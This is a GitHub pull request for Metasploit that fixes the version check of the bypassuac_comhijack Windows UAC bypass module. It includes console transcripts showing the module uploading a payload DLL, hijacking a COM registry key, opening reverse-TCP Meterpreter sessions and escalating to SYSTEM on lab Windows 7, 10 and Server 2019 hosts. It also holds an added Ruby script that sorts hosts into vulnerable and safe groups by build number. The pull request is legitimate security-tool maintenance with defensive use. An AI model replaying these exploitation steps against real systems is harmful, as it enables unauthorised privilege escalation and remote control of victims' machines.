
Update check comhijack #16268

Merged (2 commits, Mar 4, 2022)

Conversation

@bwatters-r7 bwatters-r7 commented Mar 3, 2022

Fixes #16216

This improves the check method for exploit/windows/local/bypassuac_comhijack by verifying build numbers for Windows 10 and 2016+ Server editions. It also adds the AutoCheck changes and includes a rubocop cleanup.

Testing

  • Get a Meterpreter session on a Windows 7-10 v21H2 workstation and/or Server system.
  • use exploit/windows/local/bypassuac_comhijack
  • set session <session>
  • Verify that Windows versions prior to 10 v1903 (Build 18362) are reported as vulnerable by the check method and yield an elevated session.
  • Repeat for different targets.

Windows 7

msf6 exploit(windows/local/bypassuac_comhijack) > check

[*] System OS Detected: Windows 7 (6.1 Build 7601, Service Pack 1).
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 7 (6.1 Build 7601, Service Pack 1).
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\vTaDaQNy.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200262 bytes) to 10.5.132.160
[*] Cleaning up registry; this can take some time...
[*] Meterpreter session 23 opened (10.5.135.101:4444 -> 10.5.132.160:49180 ) at 2022-03-03 12:49:21 -0600
[-] Failed to delete C:\Users\msfuser\AppData\Local\Temp\vTaDaQNy.dll: stdapi_fs_delete_file: Operation failed: Access is denied.

meterpreter > sysinfo
Computer        : WIN7X64-SP1
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN7X64-SP1\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows 10 v1809

msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 10 (10.0 Build 17763).
[*] Detected build number: 17763
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\FAiHLtSt.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200262 bytes) to 10.5.132.104
[*] Cleaning up registry ...
[*] Meterpreter session 21 opened (10.5.135.101:4444 -> 10.5.132.104:49680 ) at 2022-03-03 12:36:10 -0600

meterpreter > sysinfo
Computer        : DESKTOP-6G879SE
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-6G879SE\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows Server 2019

msf6 exploit(windows/local/bypassuac_comhijack) > sessions -i 18
[*] Starting interaction with 18...

meterpreter > sysinfo
Computer        : WIN-2E6BPFGP9F7
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-2E6BPFGP9F7\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 18...
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Checking admin status...
[*] System OS Detected: Windows 2016+ (10.0 Build 17763).
[*] Detected build number: 17763
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\wCbobiAc.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200262 bytes) to 10.5.132.126
[*] Cleaning up registry ...
[*] Meterpreter session 19 opened (10.5.135.101:4444 -> 10.5.132.126:49684 ) at 2022-03-03 12:19:14 -0600

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Windows 10x64 1909

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-EHIBEQF
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-EHIBEQF\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/bypassuac_comhijack 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf6 exploit(windows/local/bypassuac_comhijack) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_comhijack) > set verbose true
verbose => true
msf6 exploit(windows/local/bypassuac_comhijack) > run

[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows 10 (10.0 Build 18363).
[*] Detected build number: 18363
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > 

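Worked example, added here and not code from the PR or from the metasploit-framework module: a small Ruby classifier that applies the build-number rule the PR describes (Windows 10 and Server 2016+ builds below 18362, i.e. before v1903, are affected; the 6.x-kernel Windows 7 host in the transcript is reported as vulnerable with no build cutoff, which this code takes as an assumption) to the OS strings that Meterpreter's sysinfo prints. A defender can run it over an inventory export to see which hosts the check would still flag and prioritise them for upgrade or for monitoring of per-user CLSID registry writes. The function names, the `triage` inventory shape and the sample hosts are assumptions/constructed; the OS-string formats are copied from the transcripts above.

```ruby
# Added example; not code from the rapid7/metasploit-framework module.
# Applies the build-number rule from the PR description to the OS strings that
# Meterpreter's sysinfo prints, so an inventory can be triaged for hosts that
# the updated check would still report as affected.

# Windows 10 v1903 ships build 18362; the PR states earlier builds are affected.
FIRST_UNAFFECTED_BUILD = 18362

# Parse "Windows 10 (10.0 Build 17763)." or
# "Windows 7 (6.1 Build 7601, Service Pack 1)." into its components.
# Returns nil for anything that does not look like a Windows OS string.
def parse_windows_os(os_string)
  m = os_string.match(
    /\AWindows (?<product>[^(]+?) \((?<major>\d+)\.(?<minor>\d+) Build (?<build>\d+)/
  )
  return nil unless m

  {
    product: m[:product],
    major: m[:major].to_i,
    minor: m[:minor].to_i,
    build: m[:build].to_i
  }
end

# Classify one OS string:
#   :vulnerable - the check would report "appears to be vulnerable"
#   :safe       - the check would report "not exploitable"
#   :unknown    - not a parseable Windows version string
def comhijack_status(os_string)
  info = parse_windows_os(os_string)
  return :unknown if info.nil?

  # Assumption: 6.x kernels (Windows 7 era) have no build cutoff in the PR;
  # the Windows 7 transcript shows them reported as vulnerable.
  return :vulnerable if info[:major] < 10

  # Windows 10 and Server 2016+ share the 10.0 kernel line; only the build
  # number distinguishes v1809 (17763, affected) from v1909 (18363, not).
  info[:build] < FIRST_UNAFFECTED_BUILD ? :vulnerable : :safe
end

# Triage an inventory (hostname => sysinfo OS string) and return the
# hostnames grouped by status, so affected hosts can be prioritised for
# upgrade or watched for HKCU\Software\Classes\CLSID modifications.
def triage(inventory)
  groups = { vulnerable: [], safe: [], unknown: [] }
  inventory.each do |host, os|
    groups[comhijack_status(os)] << host
  end
  groups
end

# Constructed sample inventory; the OS strings mirror the transcript formats.
SAMPLE_INVENTORY = {
  'ws-legacy-01' => 'Windows 7 (6.1 Build 7601, Service Pack 1).',
  'ws-1809-02'   => 'Windows 10 (10.0 Build 17763).',
  'srv-2019-01'  => 'Windows 2016+ (10.0 Build 17763).',
  'ws-1909-03'   => 'Windows 10 (10.0 Build 18363).',
  'ws-21h2-04'   => 'Windows 10 (10.0 Build 19044).',
  'nas-01'       => 'Linux 5.10 (x86_64)'
}.freeze

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_INVENTORY).each do |status, hosts|
    puts "#{status}: #{hosts.join(', ')}"
  end
end
```

Note that the Server 2019 host is reported as "Windows 2016+" with the same 17763 build as Windows 10 v1809, which is why the classifier keys on the build number rather than the product name; that mirrors the transcripts, where both are flagged as vulnerable.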

@bwatters-r7 bwatters-r7 added bug rn-fix release notes fix easy labels Mar 3, 2022
@smcintyre-r7 smcintyre-r7 self-assigned this Mar 4, 2022
@smcintyre-r7 smcintyre-r7 left a comment

LGTM. I tested that it still works on Windows 10 v1803, but properly identifies that v21H2 is not vulnerable. Thanks for the patch @bwatters-r7!

Testing Output

Windows 10 x64 v1803

msf6 exploit(windows/local/bypassuac_comhijack) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/bypassuac_comhijack) > 
msf6 exploit(windows/local/bypassuac_comhijack) > show options 

Module options (exploit/windows/local/bypassuac_comhijack):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  -1               yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/bypassuac_comhijack) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > exploit

[-] Handler failed to bind to 192.168.159.128:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\SMCINT~1\AppData\Local\Temp\GKelnqRg.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200262 bytes) to 192.168.159.91
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.91:51936 ) at 2022-03-04 09:47:51 -0500
[*] Cleaning up registry; this can take some time...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > jobs

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.159.128:4444

msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > check VERBOSE=true

[*] System OS Detected: Windows 10 (10.0 Build 17134).
[*] Detected build number: 17134
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: DESKTOP-2OL4COJ\smcintyre
meterpreter > sysinfo
Computer        : DESKTOP-2OL4COJ
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

Windows 10 x64 v21H2

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > getuid
Server username: DESKTOP-SRAQBLH\smcintyre
meterpreter > sysinfo
Computer        : DESKTOP-SRAQBLH
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background 
[*] Backgrounding session 3...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > previous 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > run

[-] Handler failed to bind to 192.168.159.128:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target is not exploitable.
msf6 exploit(windows/local/bypassuac_comhijack) > 

@smcintyre-r7 smcintyre-r7 merged commit 83b2f5a into rapid7:master Mar 4, 2022
@smcintyre-r7

Release Notes

This updates the check method of the exploit/windows/local/bypassuac_comhijack module to identify Windows 10 versions 1903 and later as not being affected. This also switches the module to run the check method automatically which will help inform users when the target system is or is not vulnerable.

@bwatters-r7 bwatters-r7 deleted the update-check-comhijack branch March 24, 2022 21:02
Successfully merging this pull request may close these issues.

bypassuac_comhijack should give a meterpreter session, instead it goes back to msfconsole